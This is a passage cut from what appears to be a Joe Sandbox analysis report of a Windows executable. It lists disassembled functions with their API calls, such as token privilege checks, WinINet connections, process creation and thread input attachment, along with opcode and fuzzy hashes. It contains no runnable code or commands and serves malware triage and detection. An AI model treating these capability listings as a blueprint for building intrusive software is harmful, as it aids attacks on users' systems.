                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                            • String ID:
                                            • API String ID: 521402451-0
                                            • Opcode ID: 3d3bd075f033ec540ef87e66b361748069f039370422c67800c747fde06f207b
                                            • Instruction ID: 597f8241c735efd8da83a1cdbae670549d2ba171335a7c1d4bc1e447bae056fa
                                            • Opcode Fuzzy Hash: 3d3bd075f033ec540ef87e66b361748069f039370422c67800c747fde06f207b
                                            • Instruction Fuzzy Hash: 87112772944208AECB04B7B4AC4A9FEBFE99F85320F14615AF104772D2DE202D85C391
                                            Function 00E68B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E68652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E68669
                                              • Part of subcall function 00E68652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E68673
                                              • Part of subcall function 00E68652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68682
                                              • Part of subcall function 00E68652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68689
                                              • Part of subcall function 00E68652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E6869F
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E68BEB
                                            • _memcmp.LIBCMT ref: 00E68C0E
                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E68C44
                                            • HeapFree.KERNEL32(00000000), ref: 00E68C4B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                            • String ID:
                                            • API String ID: 1592001646-0
                                            • Opcode ID: 41e4e4b4b7112891ee00fa0e2dd0935d25ce22e55faee22b8be4885ef885946f
                                            • Instruction ID: 1d9601b43840d1963d8320526f7fb5f8b8ffa35a676746d8cbcd9c5fb15b7691
                                            • Opcode Fuzzy Hash: 41e4e4b4b7112891ee00fa0e2dd0935d25ce22e55faee22b8be4885ef885946f
                                            • Instruction Fuzzy Hash: 7B219C71E81208EFCB00CFA5DA49BEEF7B8EF54384F14415AE454B7241DB31AA06CB61
                                            Function 00E81A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E81A97
                                              • Part of subcall function 00E81B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E81B40
                                              • Part of subcall function 00E81B21: InternetCloseHandle.WININET(00000000), ref: 00E81BDD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Internet$CloseConnectHandleOpen
                                            • String ID:
                                            • API String ID: 1463438336-0
                                            • Opcode ID: f3aae3a2595a959e27fa096bff53089bb8e5f18b2a71ecb8a3d01464a52e7f79
                                            • Instruction ID: 4c8baaf3a38e705bfbe641b00d5fd299663ad66f76e175f0261ce739e8367096
                                            • Opcode Fuzzy Hash: f3aae3a2595a959e27fa096bff53089bb8e5f18b2a71ecb8a3d01464a52e7f79
                                            • Instruction Fuzzy Hash: 3D218E35201601BFDB16AF61CC01FBAB7ADFF44701F10105BFA5EA6650EB71D8169BA0
                                            Function 00E6E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E6F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E6E1C4,?,?,?,00E6EFB7,00000000,000000EF,00000119,?,?), ref: 00E6F5BC
                                              • Part of subcall function 00E6F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00E6F5E2
                                              • Part of subcall function 00E6F5AD: lstrcmpiW.KERNEL32(00000000,?,00E6E1C4,?,?,?,00E6EFB7,00000000,000000EF,00000119,?,?), ref: 00E6F613
                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E6E1DD
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00E6E203
                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E6E237
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: lstrcmpilstrcpylstrlen
                                            • String ID: cdecl
                                            • API String ID: 4031866154-3896280584
                                            • Opcode ID: f4d9a0449a797880b3adca41989e000bf108fd07f637a40bc80ff77766ac63fb
                                            • Instruction ID: a3f329fba21812991f436ede053392faee4ecfa70696c839dff4c5dc1c5a51d9
                                            • Opcode Fuzzy Hash: f4d9a0449a797880b3adca41989e000bf108fd07f637a40bc80ff77766ac63fb
                                            • Instruction Fuzzy Hash: FC11D33A200301EFCB25AF65EC49D7A77A9FF44390B40502AF806DB2A4EB719C51D790
                                            Function 00E45332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _free.LIBCMT ref: 00E45351
                                              • Part of subcall function 00E3594C: __FF_MSGBANNER.LIBCMT ref: 00E35963
                                              • Part of subcall function 00E3594C: __NMSG_WRITE.LIBCMT ref: 00E3596A
                                              • Part of subcall function 00E3594C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,?,?,?,00E31013,?), ref: 00E3598F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AllocateHeap_free
                                            • String ID:
                                            • API String ID: 614378929-0
                                            • Opcode ID: 8bffb3e52b09e8d3a4221548bdb67ff09866999988f2b2b645b0f32225451148
                                            • Instruction ID: 89b4e9ec0f983b67d40a89605dc2bfa0573e8f31aa943f2e63f1fd8132df2965
                                            • Opcode Fuzzy Hash: 8bffb3e52b09e8d3a4221548bdb67ff09866999988f2b2b645b0f32225451148
                                            • Instruction Fuzzy Hash: 9811E033504B15AFCB312F70BC086AE3BD8AF103A4F60242BF944BA1A2DEB58D40C790
                                            Function 00E14531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E14560
                                              • Part of subcall function 00E1410D: _memset.LIBCMT ref: 00E1418D
                                              • Part of subcall function 00E1410D: _wcscpy.LIBCMT ref: 00E141E1
                                              • Part of subcall function 00E1410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E141F1
                                            • KillTimer.USER32(?,00000001,?,?), ref: 00E145B5
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E145C4
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E4D6CE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                            • String ID:
                                            • API String ID: 1378193009-0
                                            • Opcode ID: ba20812bb10388a2d6268015e28d1d09fec7a1e9e93bff57ef8f4aa104b9440c
                                            • Instruction ID: 8218a46e22452a00d8eafe49bb6253af6cae3dbe8e5fc29eb8474aae9f8cbccd
                                            • Opcode Fuzzy Hash: ba20812bb10388a2d6268015e28d1d09fec7a1e9e93bff57ef8f4aa104b9440c
                                            • Instruction Fuzzy Hash: 4821DAB0908784AFE7328B24DC45BE7BBED9F01308F04109FE69DB6281C7745A88CB51
                                            Function 00E8667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E77B20,?,?,00000000), ref: 00E15B8C
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E77B20,?,?,00000000,?,?), ref: 00E15BB0
                                            • gethostbyname.WSOCK32(?,?,?), ref: 00E866AC
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E866B7
                                            • _memmove.LIBCMT ref: 00E866E4
                                            • inet_ntoa.WSOCK32(?), ref: 00E866EF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                            • String ID:
                                            • API String ID: 1504782959-0
                                            • Opcode ID: 342de1a3eaf51b0cd1e2536239661cc2572181a7b8b6e84cc3201a5ce077fd30
                                            • Instruction ID: 5e884ca5aa40c3153ba5bf3a1ebdf7b896ef72724757e02491a538d31d58320f
                                            • Opcode Fuzzy Hash: 342de1a3eaf51b0cd1e2536239661cc2572181a7b8b6e84cc3201a5ce077fd30
                                            • Instruction Fuzzy Hash: 28115E76500508AFCB04FBA4DD96DEEB7F9AF44310B145066F50AB7162DF30AE44CBA1
                                            Function 00E69023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E69043
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E69055
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E6906B
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E69086
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 1f14572b532d84d274edfb486b1bb0b0e99aacc3eaa0f93ce140a56adb957d8e
                                            • Instruction ID: 52b0070f41a5f9692d864abd273ea6dfd62cda57caebb71404f8ce5968a717e8
                                            • Opcode Fuzzy Hash: 1f14572b532d84d274edfb486b1bb0b0e99aacc3eaa0f93ce140a56adb957d8e
                                            • Instruction Fuzzy Hash: 32115E79940218FFDB10DFA5CD84EDDBBB8FB48350F204095E904B7291D6716E10DB90
                                            Function 00E11290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DefDlgProcW.USER32(?,00000020,?), ref: 00E112D8
                                            • GetClientRect.USER32(?,?), ref: 00E4B84B
                                            • GetCursorPos.USER32(?), ref: 00E4B855
                                            • ScreenToClient.USER32(?,?), ref: 00E4B860
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Client$CursorLongProcRectScreenWindow
                                            • String ID:
                                            • API String ID: 4127811313-0
                                            • Opcode ID: 9058c5e5a1d65d0d0ad1772fbfde205f7dabd3e841afee8d68198921a448377f
                                            • Instruction ID: 661d06496b33af2a762b3c74605390e4ec9a0dc4fa20993b9ad9b93c263acaff
                                            • Opcode Fuzzy Hash: 9058c5e5a1d65d0d0ad1772fbfde205f7dabd3e841afee8d68198921a448377f
                                            • Instruction Fuzzy Hash: 8A116A35900119AFCF10DF98D8859FE77B8EB05300F500496FA01F7261C734BA95EBA5
                                            Function 00E71652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E7166F
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E71694
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E7169E
                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E716D1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CounterPerformanceQuerySleep
                                            • String ID:
                                            • API String ID: 2875609808-0
                                            • Opcode ID: 028337237cdccbc19d15a11dba482b69ce521f0906f47f2c4bfea425c0e40aed
                                            • Instruction ID: 4486856fade75095523a8e15b1dee4b9b48b5ea3aa3a1cb21f8d0ba80ab8d820
                                            • Opcode Fuzzy Hash: 028337237cdccbc19d15a11dba482b69ce521f0906f47f2c4bfea425c0e40aed
                                            • Instruction Fuzzy Hash: 0C113C31C0161DDBCF04AFEAD949AEEBB78FF09751F05909AE988B6240CB3055648BD6
                                            Function 00E47207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction ID: 920a27821921aa3891e3912e7f3b474273c845253afd2c06a0a1b748c6f04a9b
                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction Fuzzy Hash: 6601807244414ABBCF125E84EC018EE3F62BF59345B499615FA9868031D377C9B1AB85
                                            Function 00E9B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 00E9B59E
                                            • ScreenToClient.USER32(?,?), ref: 00E9B5B6
                                            • ScreenToClient.USER32(?,?), ref: 00E9B5DA
                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E9B5F5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClientRectScreen$InvalidateWindow
                                            • String ID:
                                            • API String ID: 357397906-0
                                            • Opcode ID: 0753f015acbdad7428cd24aee696d419d172f93df856f70aff1779cc6cb1462d
                                            • Instruction ID: 72111a9fd32434ae4e39c69031911d9e73cffad883137e424fc69efa35704bfc
                                            • Opcode Fuzzy Hash: 0753f015acbdad7428cd24aee696d419d172f93df856f70aff1779cc6cb1462d
                                            • Instruction Fuzzy Hash: 7C1146B5D00209EFDB41CF99D544AEEFBB5FB08310F104166E915E3220D735AA558F91
                                            Function 00E9B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E9B8FE
                                            • _memset.LIBCMT ref: 00E9B90D
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00ED7F20,00ED7F64), ref: 00E9B93C
                                            • CloseHandle.KERNEL32 ref: 00E9B94E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$CloseCreateHandleProcess
                                            • String ID:
                                            • API String ID: 3277943733-0
                                            • Opcode ID: 69fccaa0f4233d47ddf915f3bf86cf0cff448212f83c26173bbc5ccada4b4cf1
                                            • Instruction ID: 7e6364cda6b333044b5e74e2302678764000279f4d57d984a2aa9e33b0915c24
                                            • Opcode Fuzzy Hash: 69fccaa0f4233d47ddf915f3bf86cf0cff448212f83c26173bbc5ccada4b4cf1
                                            • Instruction Fuzzy Hash: 10F030B16493007EE2206772AC06F7B3B9CEB08354F401022BA48F5291E775490487A8
                                            Function 00E76E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?), ref: 00E76E88
                                              • Part of subcall function 00E7794E: _memset.LIBCMT ref: 00E77983
                                            • _memmove.LIBCMT ref: 00E76EAB
                                            • _memset.LIBCMT ref: 00E76EB8
                                            • LeaveCriticalSection.KERNEL32(?), ref: 00E76EC8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                            • String ID:
                                            • API String ID: 48991266-0
                                            • Opcode ID: 2021883ee53ae5eac39cfc2967c3170e98b8cbdaabd074aaa96cd82f3670131e
                                            • Instruction ID: fa17b53d722fb35075c840102ff4c2f90244331e3624540cdf83ec4387146c5e
                                            • Opcode Fuzzy Hash: 2021883ee53ae5eac39cfc2967c3170e98b8cbdaabd074aaa96cd82f3670131e
                                            • Instruction Fuzzy Hash: 06F0543A100200ABCF016F55DC85F4ABB69EF85320F04C066FE0CAE226C731E951CBB4
                                            Function 00E9C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E1134D
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1135C
                                              • Part of subcall function 00E112F3: BeginPath.GDI32(?), ref: 00E11373
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1139C
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E9C030
                                            • LineTo.GDI32(00000000,?,?), ref: 00E9C03D
                                            • EndPath.GDI32(00000000), ref: 00E9C04D
                                            • StrokePath.GDI32(00000000), ref: 00E9C05B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                            • String ID:
                                            • API String ID: 1539411459-0
                                            • Opcode ID: 40da4973f2ee7fe722054d9912ba617d3fd1891b0920cfdf3db11159e2c3edb1
                                            • Instruction ID: 1d3647fd70c36e36ef7ee2867f35cec8e968b90ff7e3c374a1d48f583b7f4c8d
                                            • Opcode Fuzzy Hash: 40da4973f2ee7fe722054d9912ba617d3fd1891b0920cfdf3db11159e2c3edb1
                                            • Instruction Fuzzy Hash: 76F05E35005259BFDB126F96AC0AFCE3F99AF06311F144102FA11B10E2C7755669DBD5
                                            Function 00E6A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E6A399
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E6A3AC
                                            • GetCurrentThreadId.KERNEL32 ref: 00E6A3B3
                                            • AttachThreadInput.USER32(00000000), ref: 00E6A3BA
                                            Memory Dump Source
